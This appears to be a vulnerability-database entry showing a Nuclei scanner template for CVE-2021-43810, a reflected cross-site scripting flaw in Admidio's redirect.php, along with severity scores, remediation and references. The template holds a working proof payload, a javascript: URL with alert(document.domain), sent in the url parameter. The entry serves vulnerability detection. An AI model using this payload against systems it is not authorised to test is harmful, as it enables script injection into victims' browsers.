ProjectDiscoveryNUCLEI:CVE-2021-43810Admidio - Cross-Site Scripting
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
0.007 Low
EPSS
Percentile
80.7%
A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
id: CVE-2021-43810
info:
name: Admidio - Cross-Site Scripting
author: gy741
severity: medium
description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: Upgrade to version 4.0.12 or later.
reference:
- https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
- https://nvd.nist.gov/vuln/detail/CVE-2021-43810
- https://github.com/Admidio/admidio/commit/fcb0609abc1d2f65bc1377866bd678e5d891404b
- https://github.com/Admidio/admidio/commit/c043267d362f7813543cc2785119bf3e3e54fe21
- https://github.com/Admidio/admidio/releases/tag/v4.0.12
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-43810
cwe-id: CWE-79
epss-score: 0.00396
epss-percentile: 0.73393
cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: admidio
product: admidio
tags: cve2021,cve,admidio,xss
http:
- method: GET
path:
- '{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'please click <a href="javascript://%0aalert(document.domain)" target="_self">'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044021f55f2788a37c785e9107ae5f7513b2f901b9be94ff5ac898e573b286d0725ae0221009a73e086bfa523be7848ca3061e08aa947e3c230a48ba2b1c979a598794eb753:922c64590222798bb761d5b6d8e72950References
github.com/Admidio/admidio/commit/c043267d362f7813543cc2785119bf3e3e54fe21
github.com/Admidio/admidio/commit/fcb0609abc1d2f65bc1377866bd678e5d891404b
github.com/Admidio/admidio/releases/tag/v4.0.12
github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
nvd.nist.gov/vuln/detail/CVE-2021-43810
Related
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
0.007 Low
EPSS
Percentile
80.7%